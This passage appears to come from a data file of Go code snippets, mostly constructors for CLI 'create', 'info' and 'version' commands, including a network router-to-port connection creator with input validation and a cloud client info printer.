edgeOptions{\n\t\t\t\tCommonOptions: common.CommonOptions{Factory: f, Out: out, Err: errOut},\n\t\t\t},\n\t\t}\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"identity\",\n\t\tShort: \"creates a new identity managed by the Ziti Edge Controller\",\n\t\tLong: \"creates a new identity managed by the Ziti Edge Controller\",\n\t}\n\n\tcmd.AddCommand(newCreateIdentityOfTypeCmd(\"device\", newOptions()))\n\tcmd.AddCommand(newCreateIdentityOfTypeCmd(\"user\", newOptions()))\n\tcmd.AddCommand(newCreateIdentityOfTypeCmd(\"service\", newOptions()))\n\n\treturn cmd\n}", "func (h *Handler) CreateCommand(w http.ResponseWriter, r *http.Request) {\n\t// Decode request.\n\tvar cmd sigstat.Command\n\n\tif err := json.NewDecoder(r.Body).Decode(&cmd); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t//Create command\n\tid, errc := h.client.CommandService().CreateCommand(cmd)\n\n\t//Handle error from client\n\tif errc != nil {\n\t\tif err := json.NewEncoder(w).Encode(&createCommandResponse{Err: errc.Error()}); err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\t}\n\n\t//Handle json serialization\n\tif err := json.NewEncoder(w).Encode(&createCommandResponse{GroupID: id}); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func buildInfo(c *cli.Context) error {\n\trepo := c.Args().First()\n\towner, name, err := parseRepo(repo)\n\tif err != nil {\n\t\treturn err\n\t}\n\tnumber, err := strconv.Atoi(c.Args().Get(1))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclient, err := newClient(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbuild, err := client.Build(owner, name, number)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttmpl, err := template.New(\"_\").Parse(c.String(\"format\"))\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn tmpl.Execute(os.Stdout, build)\n}", "func NewInfo(createResponse string, modified *time.Time) (os.FileInfo, error) {\n\n\telements := strings.SplitN(createResponse, \" \", 3)\n\tif len(elements) != 3 {\n\t\treturn nil, fmt.Errorf(\"invalid download createResponse: %v\", createResponse)\n\t}\n\tisDir := strings.HasPrefix(elements[0], \"D\")\n\tmodeLiteral := string(elements[0][1:])\n\tmode, err := strconv.ParseInt(modeLiteral, 8, 64)\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"invalid mode: %v\", modeLiteral)\n\t}\n\tsizeLiteral := elements[1]\n\tsize, err := strconv.ParseInt(sizeLiteral, 10, 64)\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"invalid size: %v\", modeLiteral)\n\t}\n\tname := strings.Trim(elements[2], \"\\r\\n\")\n\tif modified == nil {\n\t\tnow := time.Now()\n\t\tmodified = &now\n\t}\n\treturn file.NewInfo(name, size, os.FileMode(mode), *modified, isDir), nil\n}", "func NewCreateCommand(c2aeClientFactory cli.APIClientFactory) Command {\n\tcreateCmd := &createCommand{\n\t\tc2aeClientFactory: c2aeClientFactory,\n\t}\n\n\tcobraCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a new rule\",\n\t\tRunE: createCmd.run,\n\t}\n\n\tcobraCmd.Flags().StringVar(&createCmd.flags.Description, \"description\", \"\", \"short description of the rule\")\n\tcobraCmd.Flags().StringVar(&createCmd.flags.Action, \"action\", \"\", \"action to be performed when the rule will trigger\")\n\n\tcobraCmd.MarkFlagCustom(\"action\", CompletionFuncNameAction)\n\n\tcobraCmd.MarkFlagRequired(\"description\")\n\tcobraCmd.MarkFlagRequired(\"action\")\n\n\tcreateCmd.cobraCmd = cobraCmd\n\n\treturn createCmd\n}", "func (p *DefaultParsedRedirect) CreateCommand(executable string) (cmd *exec.Cmd) {\n\tcmd = execCmdFn(executable, p.args...)\n\tcmd.Env = os.Environ()\n\tcmd.Stdout = p.shell.OutStream()\n\tcmd.Stderr = p.shell.ErrStream()\n\tcmd.Stdin = p.shell.InStream()\n\treturn\n}", "func NewInfo(task, source, schema, table string, ddls []string) Info {\n\treturn Info{\n\t\tTask: task,\n\t\tSource: source,\n\t\tSchema: schema,\n\t\tTable: table,\n\t\tDDLs: ddls,\n\t}\n}", "func NewCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"The version of matryoshka\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tfmt.Println(BuildCommit)\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func newCommand(name, argsSpec, description string, init func(*flag.FlagSet), f func(*flag.FlagSet) error) command {\n\tfs := flag.NewFlagSet(name, flag.ExitOnError)\n\tinit(fs)\n\tif fs.Usage == nil {\n\t\tfs.Usage = func() {\n\t\t\tfmt.Fprintln(os.Stderr, \"#\", description)\n\t\t\tfmt.Fprintln(os.Stderr, name, argsSpec)\n\t\t\tfs.PrintDefaults()\n\t\t}\n\t}\n\treturn command{fs, f}\n}", "func (o *FileInfoCreateParams) WithInfo(info *models.FileInfo) *FileInfoCreateParams {\n\to.SetInfo(info)\n\treturn o\n}", "func New(b BuildInfo) *Command {\n\tfs := flag.NewFlagSet(\"changelog\", flag.ExitOnError)\n\n\treturn &Command{\n\t\tfs: fs,\n\t\tb: b,\n\t\tfile: fs.String(fileOptName, dfltChangelogFile, \"changelog file name\"),\n\t\tdebug: fs.Bool(debugOptName, false, \"log debug information\"),\n\t\ttoStdOut: fs.Bool(stdOutOptName, false, \"output changelog to stdout instead to file\"),\n\t\thistory: fs.Bool(historyOptName, false, \"create history of old versions tags (output is always stdout)\"),\n\t\tignore: fs.Bool(ignoreOptName, false, \"ignore parsing errors of invalid (not conventional) commit messages\"),\n\t\tsinceTag: fs.String(sinceTagOptName, \"\", fmt.Sprintf(\"in combination with -%s: if a tag is specified, the changelog will be created from that tag on\", historyOptName)),\n\t\tinitConfig: fs.Bool(initDfltConfigOptName, false, fmt.Sprintf(\"initialize a default changelog configuration '%s'\", config.FileName)),\n\t\tnoPrompt: fs.Bool(noPromptOptName, false, \"do not prompt for next version\"),\n\t\tversion: fs.Bool(versionOptName, false, \"show program version information\"),\n\t\tnum: fs.Int(numOptName, 0, fmt.Sprintf(\"in combination with -%s: the number of tags to go back\", historyOptName)),\n\t}\n}", "func newCreateCmd(clientFn func() (*fic.ServiceClient, error), out io.Writer) *cobra.Command {\n\tvar (\n\t\tsrcRouterID string\n\t\tsrcGroupName string\n\t\tsrcPrimary string\n\t\tsrcSecondary string\n\t\tsrcRouteFilter string\n\t\tdestPrimary string\n\t\tdestSecondary string\n\t\tbandwidth string\n\t)\n\n\tr := regexp.MustCompile(`^[\\w&()-]{1,64}$`)\n\tvalidateSrc := func(splitSrc []string, isPrimary, hasSecondary bool) error {\n\t\t_, ipNet, err := net.ParseCIDR(splitSrc[0])\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"ipAddress must be CIDR whose subnet mask is 30, e.g. 10.0.0.1/30: received %s\", splitSrc[0])\n\t\t}\n\t\tsubNetMaskLength, _ := ipNet.Mask.Size()\n\t\tif subNetMaskLength != 30 {\n\t\t\treturn fmt.Errorf(\"subnet mask of ipAddress must be 30, e.g. 10.0.0.1/30: received %s\", splitSrc[0])\n\t\t}\n\n\t\tif !utils.StringInSlice(splitSrc[1], validPrepends) {\n\t\t\treturn fmt.Errorf(\"asPathPrepend.in must be one of %s: received %s\", validPrepends, splitSrc[1])\n\t\t}\n\n\t\tif !utils.StringInSlice(splitSrc[2], validPrepends) {\n\t\t\treturn fmt.Errorf(\"asPathPrepend.out must be one of %s: received %s\", validPrepends, splitSrc[2])\n\t\t}\n\n\t\tif isPrimary {\n\t\t\tmed, err := strconv.Atoi(splitSrc[3])\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"med.out must be numeric value: received %s\", splitSrc[3])\n\t\t\t}\n\n\t\t\tif hasSecondary {\n\t\t\t\tif !utils.IntInSlice(med, validPrimaryPairedMEDs) {\n\t\t\t\t\treturn fmt.Errorf(\"med.out in paired connection must be one of %v: received %d\", validPrimaryPairedMEDs, med)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tif !utils.IntInSlice(med, validPrimarySingleMEDs) {\n\t\t\t\t\treturn fmt.Errorf(\"med.out in single connection must be one of %v: received %d\", validPrimarySingleMEDs, med)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t}\n\tvalidateDest := func(splitDest []string) error {\n\t\tvlan, err := strconv.Atoi(splitDest[1])\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"vlan must be numeric value: received %s\", splitDest[1])\n\t\t}\n\t\tif vlan < 101 || vlan > 3300 {\n\t\t\treturn fmt.Errorf(\"vlan must be range of 101 to 3300: received %s\", splitDest[1])\n\t\t}\n\n\t\t_, ipNet, err := net.ParseCIDR(splitDest[2])\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"ipAddress must be CIDR whose subnet mask is 30, e.g. 10.0.0.2/30: received %s\", splitDest[2])\n\t\t}\n\t\tsubNetMaskLength, _ := ipNet.Mask.Size()\n\t\tif subNetMaskLength != 30 {\n\t\t\treturn fmt.Errorf(\"subnet mask of ipAddress must be 30, e.g. 10.0.0.2/30: received %s\", splitDest[2])\n\t\t}\n\n\t\tasn, err := strconv.Atoi(splitDest[3])\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"asn must be numeric value: received %s\", splitDest[3])\n\t\t}\n\t\tif asn < 1 || asn > 65535 {\n\t\t\treturn fmt.Errorf(\"asn must be range of 1 to 65535: received %s\", splitDest[3])\n\t\t}\n\t\treturn nil\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"create <name>\",\n\t\tShort: \"Create router to port connection\",\n\t\tExample: \"# In case of non paired-connection \\n\" +\n\t\t\t\"fic router-to-port-connections create YourConnectionName \" +\n\t\t\t\"--source-router F020123456789 \" +\n\t\t\t\"--source-group group_1 \" +\n\t\t\t\"--source-primary 10.0.0.1/30,4,4,10 \" +\n\t\t\t\"--source-route-filter fullRoute,fullRouteWithDefaultRoute \" +\n\t\t\t\"--destination-primary F010123456789,101,10.0.0.2/30,65000 \" +\n\t\t\t\"--bandwidth 10M \\n\\n\" +\n\t\t\t\"# In case of paired-connection \\n\" +\n\t\t\t\"fic router-to-port-connections create YourConnectionName \" +\n\t\t\t\"--source-router F020123456789 \" +\n\t\t\t\"--source-group group_1 \" +\n\t\t\t\"--source-primary 10.0.0.1/30,4,4,10 \" +\n\t\t\t\"--source-secondary 10.0.0.5/30,2,1 \" +\n\t\t\t\"--source-route-filter fullRoute,fullRouteWithDefaultRoute \" +\n\t\t\t\"--destination-primary F010123456789,101,10.0.0.2/30,65000 \" +\n\t\t\t\"--destination-secondary F019876543210,102,10.0.0.6/30,65000 \" +\n\t\t\t\"--bandwidth 10M\",\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\n\t\t\tif !r.MatchString(args[0]) {\n\t\t\t\treturn fmt.Errorf(\"name of router to port connection must be composed of alpha-numeric \"+\n\t\t\t\t\t\"characters and & ( ) - _, and must have maximum length of 64 as well: received %s\", args[0])\n\t\t\t}\n\n\t\t\tif !utils.StringInSlice(srcGroupName, validGroupNames) {\n\t\t\t\treturn fmt.Errorf(\"source-group must be one of %s: received %s\", validGroupNames, srcGroupName)\n\t\t\t}\n\n\t\t\tsplitSrcPrimary := strings.Split(strings.TrimSpace(srcPrimary), \",\")\n\t\t\tsplitSrcSecondary := strings.Split(strings.TrimSpace(srcSecondary), \",\")\n\t\t\tsplitSrcRouteFilter := strings.Split(strings.TrimSpace(srcRouteFilter), \",\")\n\t\t\tsplitDestPrimary := strings.Split(strings.TrimSpace(destPrimary), \",\")\n\t\t\tsplitDestSecondary := strings.Split(strings.TrimSpace(destSecondary), \",\")\n\n\t\t\tif len(splitSrcPrimary) != 4 {\n\t\t\t\treturn fmt.Errorf(\"source-primary must have format like \"+\n\t\t\t\t\t\"<ipAddress>,<asPathPrepend.in>,<asPathPrepend.out>,<med.out>: received %s\", srcPrimary)\n\t\t\t}\n\t\t\tif err := validateSrc(splitSrcPrimary, true, srcSecondary != \"\"); err != nil {\n\t\t\t\treturn fmt.Errorf(\"in source-primary, %w\", err)\n\t\t\t}\n\n\t\t\tif len(splitDestPrimary) != 4 {\n\t\t\t\treturn fmt.Errorf(\"destination-primary must have format like \"+\n\t\t\t\t\t\"<portId>,<vlan>,<ipAddress>,<asn>: received %s\", destPrimary)\n\t\t\t}\n\t\t\tif err := validateDest(splitDestPrimary); err != nil {\n\t\t\t\treturn fmt.Errorf(\"in destination-primary, %w\", err)\n\t\t\t}\n\n\t\t\tif srcSecondary != \"\" {\n\t\t\t\tif len(splitSrcSecondary) != 3 {\n\t\t\t\t\treturn fmt.Errorf(\"source-secondary must have format like \"+\n\t\t\t\t\t\t\"<ipAddress>,<asPathPrepend.in>,<asPathPrepend.out>: received %s\", srcSecondary)\n\t\t\t\t}\n\t\t\t\tif err := validateSrc(splitSrcSecondary, false, true); err != nil {\n\t\t\t\t\treturn fmt.Errorf(\"in source-secondary, %w\", err)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tredundant := false\n\t\t\tif destSecondary != \"\" {\n\t\t\t\tif len(splitDestSecondary) != 4 {\n\t\t\t\t\treturn fmt.Errorf(\"destination-secondary must have format like \"+\n\t\t\t\t\t\t\"<portId>,<vlan>,<ipAddress>,<asn>: received %s\", destSecondary)\n\t\t\t\t}\n\t\t\t\tif err := validateDest(splitDestSecondary); err != nil {\n\t\t\t\t\treturn fmt.Errorf(\"in destination-secondary, %w\", err)\n\t\t\t\t}\n\t\t\t\tredundant = true\n\t\t\t}\n\n\t\t\tif len(splitSrcRouteFilter) != 2 {\n\t\t\t\treturn fmt.Errorf(\"source-route-filter must have format like \"+\n\t\t\t\t\t\"<routeFilter.in>,<routeFilter.out>: received %s\", srcRouteFilter)\n\t\t\t}\n\t\t\tif !utils.StringInSlice(splitSrcRouteFilter[0], validRouteFilterIns) {\n\t\t\t\treturn fmt.Errorf(\"routeFilter.in must be one of %s: received %s\", validRouteFilterIns, splitSrcRouteFilter[0])\n\t\t\t}\n\t\t\tif !utils.StringInSlice(splitSrcRouteFilter[1], validRouteFilterOuts) {\n\t\t\t\treturn fmt.Errorf(\"routeFilter.out must be one of %s: received %s\", validRouteFilterOuts, splitSrcRouteFilter[1])\n\t\t\t}\n\n\t\t\tif !utils.StringInSlice(bandwidth, validBandwidths) {\n\t\t\t\treturn fmt.Errorf(\"bandwidth must be one of %s: received %s\", validBandwidths, bandwidth)\n\t\t\t}\n\n\t\t\tclient, err := clientFn()\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"creating FIC client: %w\", err)\n\t\t\t}\n\n\t\t\tprependIn, prependOut := interface{}(convPrepend(splitSrcPrimary[1])), interface{}(convPrepend(splitSrcPrimary[2]))\n\t\t\tmed, _ := strconv.Atoi(splitSrcPrimary[3])\n\t\t\tvlan, _ := strconv.Atoi(splitDestPrimary[1])\n\n\t\t\tt := utils.NewTabby(out)\n\t\t\tt.AddHeader(\"id\", \"name\", \"redundant\", \"tenantId\", \"area\", \"operationStatus\", \"bandwidth\", \"operationId\")\n\n\t\t\tif !redundant {\n\t\t\t\topts := singleConn.CreateOpts{\n\t\t\t\t\tName: args[0],\n\t\t\t\t\tSource: singleConn.Source{\n\t\t\t\t\t\tRouterID: srcRouterID,\n\t\t\t\t\t\tGroupName: srcGroupName,\n\t\t\t\t\t\tRouteFilter: singleConn.RouteFilter{\n\t\t\t\t\t\t\tIn: splitSrcRouteFilter[0],\n\t\t\t\t\t\t\tOut: splitSrcRouteFilter[1],\n\t\t\t\t\t\t},\n\t\t\t\t\t\tPrimary: singleConn.SourceHAInfo{\n\t\t\t\t\t\t\tIPAddress: splitSrcPrimary[0],\n\t\t\t\t\t\t\tASPathPrepend: singleConn.ASPathPrepend{\n\t\t\t\t\t\t\t\tIn: &prependIn,\n\t\t\t\t\t\t\t\tOut: &prependOut,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\tMED: &singleConn.MED{\n\t\t\t\t\t\t\t\tOut: med,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tDestination: singleConn.Destination{\n\t\t\t\t\t\tPrimary: singleConn.DestinationHAInfo{\n\t\t\t\t\t\t\tPortID: splitDestPrimary[0],\n\t\t\t\t\t\t\tVLAN: vlan,\n\t\t\t\t\t\t\tIPAddress: splitDestPrimary[2],\n\t\t\t\t\t\t\tASN: splitDestPrimary[3],\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tBandwidth: bandwidth,\n\t\t\t\t}\n\n\t\t\t\tc, err := singleConn.Create(client, opts).Extract()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn fmt.Errorf(\"calling Create router to port connection API: %w\", err)\n\t\t\t\t}\n\n\t\t\t\tt.AddLine(c.ID, c.Name, c.Redundant, c.TenantID, c.Area, c.OperationID, c.OperationStatus, c.Bandwidth)\n\t\t\t\tt.Print()\n\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tsecondPrependIn, secondPrependOut := interface{}(convPrepend(splitSrcSecondary[1])), interface{}(convPrepend(splitSrcSecondary[2]))\n\t\t\tsecondVlan, _ := strconv.Atoi(splitDestSecondary[1])\n\n\t\t\topts := pairedConn.CreateOpts{\n\t\t\t\tName: args[0],\n\t\t\t\tSource: pairedConn.Source{\n\t\t\t\t\tRouterID: srcRouterID,\n\t\t\t\t\tGroupName: srcGroupName,\n\t\t\t\t\tRouteFilter: pairedConn.RouteFilter{\n\t\t\t\t\t\tIn: splitSrcRouteFilter[0],\n\t\t\t\t\t\tOut: splitSrcRouteFilter[1],\n\t\t\t\t\t},\n\t\t\t\t\tPrimary: pairedConn.SourceHAInfo{\n\t\t\t\t\t\tIPAddress: splitSrcPrimary[0],\n\t\t\t\t\t\tASPathPrepend: pairedConn.ASPathPrepend{\n\t\t\t\t\t\t\tIn: &prependIn,\n\t\t\t\t\t\t\tOut: &prependOut,\n\t\t\t\t\t\t},\n\t\t\t\t\t\tMED: &pairedConn.MED{\n\t\t\t\t\t\t\tOut: med,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tSecondary: pairedConn.SourceHAInfo{\n\t\t\t\t\t\tIPAddress: splitSrcSecondary[0],\n\t\t\t\t\t\tASPathPrepend: pairedConn.ASPathPrepend{\n\t\t\t\t\t\t\tIn: &secondPrependIn,\n\t\t\t\t\t\t\tOut: &secondPrependOut,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tDestination: pairedConn.Destination{\n\t\t\t\t\tPrimary: pairedConn.DestinationHAInfo{\n\t\t\t\t\t\tPortID: splitDestPrimary[0],\n\t\t\t\t\t\tVLAN: vlan,\n\t\t\t\t\t\tIPAddress: splitDestPrimary[2],\n\t\t\t\t\t\tASN: splitDestPrimary[3],\n\t\t\t\t\t},\n\t\t\t\t\tSecondary: pairedConn.DestinationHAInfo{\n\t\t\t\t\t\tPortID: splitDestSecondary[0],\n\t\t\t\t\t\tVLAN: secondVlan,\n\t\t\t\t\t\tIPAddress: splitDestSecondary[2],\n\t\t\t\t\t\tASN: splitDestSecondary[3],\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tBandwidth: bandwidth,\n\t\t\t}\n\n\t\t\tc, err := pairedConn.Create(client, opts).Extract()\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"calling Create router to port connection API: %w\", err)\n\t\t\t}\n\n\t\t\tt.AddLine(c.ID, c.Name, c.Redundant, c.TenantID, c.Area, c.OperationID, c.OperationStatus, c.Bandwidth)\n\t\t\tt.Print()\n\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.Flags().StringVar(&srcRouterID, \"source-router\", \"\", \"(Required) Router ID belonging to source\")\n\tcmd.Flags().StringVar(&srcGroupName, \"source-group\", \"\", \"(Required) Group Name belonging to source\")\n\tcmd.Flags().StringVar(\n\t\t&srcPrimary,\n\t\t\"source-primary\",\n\t\t\"\",\n\t\t\"(Required) Source Primary Info specified in the format <ipAddress>,<asPathPrepend.in>,<asPathPrepend.out>,<med.out>\")\n\tcmd.Flags().StringVar(\n\t\t&srcSecondary,\n\t\t\"source-secondary\",\n\t\t\"\",\n\t\t\"Source Secondary Info specified in the format <ipAddress>,<asPathPrepend.in>,<asPathPrepend.out>\")\n\tcmd.Flags().StringVar(\n\t\t&srcRouteFilter,\n\t\t\"source-route-filter\",\n\t\t\"\",\n\t\t\"(Required) Set of BGP Filter Ingress and Egress specified in the format <routeFilter.in>,<routeFilter.out>\")\n\tcmd.Flags().StringVar(\n\t\t&destPrimary,\n\t\t\"destination-primary\",\n\t\t\"\",\n\t\t\"(Required) Destination Primary Info specified in the format <portId>,<vlan>,<ipAddress>,<asn>\")\n\tcmd.Flags().StringVar(\n\t\t&destSecondary,\n\t\t\"destination-secondary\",\n\t\t\"\",\n\t\t\"Destination Secondary Info specified in the format <portId>,<vlan>,<ipAddress>,<asn>\")\n\tcmd.Flags().StringVar(&bandwidth, \"bandwidth\", \"\", \"(Required) Bandwidth of router to port connection\")\n\n\tcmd.MarkFlagRequired(\"source-router\")\n\tcmd.MarkFlagRequired(\"source-group\")\n\tcmd.MarkFlagRequired(\"source-primary\")\n\tcmd.MarkFlagRequired(\"source-rout-filter\")\n\tcmd.MarkFlagRequired(\"destination-primary\")\n\tcmd.MarkFlagRequired(\"bandwidth\")\n\n\treturn cmd\n}", "func (v *vcsCmd) Create(dir, repo string) error {\n\tfor _, cmd := range v.createCmd {\n\t\tif err := v.run(\".\", cmd, \"dir\", dir, \"repo\", repo); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func NewCmdCreate(out io.Writer) *cobra.Command {\n\tcf := &run.CreateFlags{}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"create <image>\",\n\t\tShort: \"Create a new VM without starting it\",\n\t\tLong: dedent.Dedent(`\n\t\t\tCreate a new VM by combining the given image and kernel.\n\t\t\tVarious VM tunables can be set during creation by using\n\t\t\tthe flags for this command. The image and kernel are\n\t\t\tmatched by prefix based on their ID and name.\n\t\t\t\n\t\t\tIf the name flag (-n, --name) is not specified,\n\t\t\tthe VM is given a random name. Using the copy files\n\t\t\tflag (-f, --copy-files), additional files can be added to\n\t\t\tthe VM during creation with the syntax /host/path:/vm/path.\n\n\t\t\tExample usage:\n\t\t\t\t$ ignite create my-image my-kernel \\\n\t\t\t\t\t--name my-vm \\\n\t\t\t\t\t--cpus 2 \\\n\t\t\t\t\t--memory 2048 \\\n\t\t\t\t\t--size 6GB\n\t\t`),\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\terrutils.Check(func() error {\n\t\t\t\tco, err := cf.NewCreateOptions(loader.NewResLoader(), args[0])\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\treturn run.Create(co)\n\t\t\t}())\n\t\t},\n\t}\n\n\taddCreateFlags(cmd.Flags(), cf)\n\treturn cmd\n}", "func NewInfo(\n\tparams []string,\n\trequestingUser string,\n) Action {\n\tinfoParams := []string{\"\"}\n\tfor i := range params {\n\t\tinfoParams[i] = params[i]\n\t}\n\n\treturn &info{\n\t\tparams: infoParams,\n\t\trequestingUser: requestingUser,\n\t}\n}", "func NewCmdPreviewCreate() (*cobra.Command, *Options) {\n\to := &Options{}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Creates a preview\",\n\t\tLong: cmdLong,\n\t\tExample: fmt.Sprintf(cmdExample, rootcmd.BinaryName),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\terr := o.Run()\n\t\t\thelper.CheckErr(err)\n\t\t},\n\t}\n\tcmd.Flags().IntVarP(&o.Number, \"pr\", \"\", 0, \"the Pull Request number. If not specified we will use $BRANCH_NAME\")\n\n\to.Options.AddFlags(cmd)\n\treturn cmd, o\n}", "func CreateCommand(args []string) (Command, error) {\n\tif len(args) <= 1 {\n\t\treturn nil, errors.New(\"expected at least one argument\")\n\t}\n\tcommand := args[1]\n\tswitch command {\n\tcase \"start\":\n\t\treturn &StartCommand{args}, nil\n\tcase \"end\":\n\t\treturn &EndCommand{args}, nil\n\t}\n\n\treturn nil, errors.New(fmt.Sprintf(\"Unsupported Command: %s\", command))\n}", "func CreateCommand(cfg Config) (Command, error) {\n\terr := cfg.CheckAndSetDefaults()\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\n\tcmd := command{\n\t\tConfig: cfg,\n\t}\n\n\tcmd.log = log.WithFields(log.Fields{\n\t\ttrace.Component: \"SCP\",\n\t\ttrace.ComponentFields: log.Fields{\n\t\t\t\"LocalAddr\": cfg.Flags.LocalAddr,\n\t\t\t\"RemoteAddr\": cfg.Flags.RemoteAddr,\n\t\t\t\"Target\": cfg.Flags.Target,\n\t\t\t\"User\": cfg.User,\n\t\t\t\"RunOnServer\": cfg.RunOnServer,\n\t\t\t\"RemoteLocation\": cfg.RemoteLocation,\n\t\t},\n\t})\n\n\treturn &cmd, nil\n}", "func InfoCommand(c *cli.Context, i storage.Impl) (n storage.Note, err error) {\n\tnName, err := NoteName(c)\n\tif err != nil {\n\t\treturn storage.Note{}, err\n\t}\n\n\tn, err = i.LoadNote(nName)\n\tif err != nil {\n\t\treturn storage.Note{}, err\n\t}\n\n\treturn n, nil\n}", "func New() *cobra.Command {\n\tcommand := cobra.Command{\n\t\tUse: \"%template%\",\n\t\tShort: \"%template%\",\n\t\tLong: \"%template%\",\n\n\t\tArgs: cobra.NoArgs,\n\n\t\tSilenceErrors: false,\n\t\tSilenceUsage: true,\n\t}\n\n\t/* configure instance */\n\tcommand.AddCommand(\n\t\tdemo.Panic(),\n\t\tdemo.Stderr(),\n\t\tdemo.Stdout(),\n\t)\n\n\treturn &command\n}", "func NewVersionCommand(streams genericclioptions.IOStreams) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Print the version information for kubectl trace\",\n\t\tRunE: func(c *cobra.Command, args []string) error {\n\t\t\tfmt.Fprintln(streams.Out, version.String())\n\t\t\treturn nil\n\t\t},\n\t}\n\treturn cmd\n}", "func NewVersionCommand(isvrCli command.Cli) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Display versions of the CLI and Server\",\n\t\tArgs: cli.NoArgs,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn runVersion(isvrCli)\n\t\t},\n\t}\n\n\treturn cmd\n}", "func RunInfo(ctx CommandContext, args InfoArgs) error {\n\t// FIXME: fmt.Fprintf(ctx.Stdout, \"Servers: %s\\n\", \"quantity\")\n\t// FIXME: fmt.Fprintf(ctx.Stdout, \"Images: %s\\n\", \"quantity\")\n\tfmt.Fprintf(ctx.Stdout, \"Debug mode (client):\\t%v\\n\", ctx.Getenv(\"DEBUG\") != \"\")\n\n\tfmt.Fprintf(ctx.Stdout, \"Organization:\\t\\t%s\\n\", ctx.API.Organization)\n\t// FIXME: add partially-masked token\n\tfmt.Fprintf(ctx.Stdout, \"API Endpoint:\\t\\t%s\\n\", api.ComputeAPI)\n\tconfigPath, _ := config.GetConfigFilePath()\n\tfmt.Fprintf(ctx.Stdout, \"RC file:\\t\\t%s\\n\", configPath)\n\tfmt.Fprintf(ctx.Stdout, \"User:\\t\\t\\t%s\\n\", ctx.Getenv(\"USER\"))\n\tfmt.Fprintf(ctx.Stdout, \"CPUs:\\t\\t\\t%d\\n\", runtime.NumCPU())\n\thostname, _ := os.Hostname()\n\tfmt.Fprintf(ctx.Stdout, \"Hostname:\\t\\t%s\\n\", hostname)\n\tcliPath, _ := osext.Executable()\n\tfmt.Fprintf(ctx.Stdout, \"CLI Path:\\t\\t%s\\n\", cliPath)\n\n\tfmt.Fprintln(ctx.Stdout, \"\")\n\tfmt.Fprintf(ctx.Stdout, \"Cache:\\t\\t\\t%s\\n\", ctx.API.Cache.Path)\n\tfmt.Fprintf(ctx.Stdout, \" Servers:\\t\\t%d\\n\", ctx.API.Cache.GetNbServers())\n\tfmt.Fprintf(ctx.Stdout, \" Images:\\t\\t%d\\n\", ctx.API.Cache.GetNbImages())\n\tfmt.Fprintf(ctx.Stdout, \" Snapshots:\\t\\t%d\\n\", ctx.API.Cache.GetNbSnapshots())\n\tfmt.Fprintf(ctx.Stdout, \" Volumes:\\t\\t%d\\n\", ctx.API.Cache.GetNbVolumes())\n\tfmt.Fprintf(ctx.Stdout, \" Bootscripts:\\t\\t%d\\n\", ctx.API.Cache.GetNbBootscripts())\n\n\tuser, err := ctx.API.GetUser()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Unable to get your SSH Keys\")\n\t}\n\n\tif len(user.SSHPublicKeys) == 0 {\n\t\tfmt.Fprintln(ctx.Stdout, \"You have no ssh keys\")\n\t} else {\n\t\tfmt.Fprintln(ctx.Stdout, \"\")\n\t\tfmt.Fprintln(ctx.Stdout, \"SSH Keys:\")\n\t\tfor id, key := range user.SSHPublicKeys {\n\t\t\tfmt.Fprintf(ctx.Stdout, \" [%d] %s\\n\", id, key.Fingerprint)\n\t\t}\n\t\tfmt.Fprintf(ctx.Stdout, \"\\n\")\n\t}\n\n\tdashboard, err := ctx.API.GetDashboard()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Unable to get your dashboard\")\n\t}\n\tfmt.Fprintln(ctx.Stdout, \"Dashboard:\")\n\tfmt.Fprintf(ctx.Stdout, \" 